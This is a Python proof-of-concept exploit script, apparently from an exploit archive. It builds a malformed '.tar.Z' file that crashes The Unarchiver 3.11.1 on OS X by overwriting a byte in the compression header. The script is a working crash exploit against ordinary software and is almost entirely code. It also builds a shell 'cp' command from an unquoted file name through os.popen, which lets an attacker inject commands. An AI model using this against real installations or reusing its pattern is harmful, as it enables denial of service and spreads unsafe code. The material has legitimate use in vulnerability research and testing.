39 lines
No EOL
1.1 KiB
Python
Executable file
39 lines
No EOL
1.1 KiB
Python
Executable file
# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
|
|
# Date: 10-17-2016
|
|
# Exploit Author: Antonio Z.
|
|
# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
|
|
# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
|
|
# Version: 3.11.1
|
|
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
|
|
|
|
# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
|
|
|
|
import os, struct, sys
|
|
from mmap import mmap
|
|
|
|
if len(sys.argv) <= 1:
|
|
print "Usage: python Local_Crash_PoC.py [file name]"
|
|
exit()
|
|
|
|
file_name = sys.argv[1]
|
|
file_mod = open(file_name, 'r+b')
|
|
file_hash = file_mod.read()
|
|
|
|
def get_extension(file_name):
|
|
basename = os.path.basename(file_name)
|
|
extension = '.'.join(basename.split('.')[1:])
|
|
return '.' + extension if extension else None
|
|
|
|
def file_maping():
|
|
maping = mmap(file_mod.fileno(),0)
|
|
maping.seek(2)
|
|
maping.write_byte(struct.pack('B', 255))
|
|
maping.close()
|
|
|
|
new_file_name = "Local_Crash_PoC" + get_extension(file_name)
|
|
|
|
os.popen('cp ' + file_name + ' ' + new_file_name)
|
|
file_mod = open(new_file_name, 'r+b')
|
|
file_maping()
|
|
file_mod.close()
|
|
print '[+] ' + 'Created file: ' + new_file_name |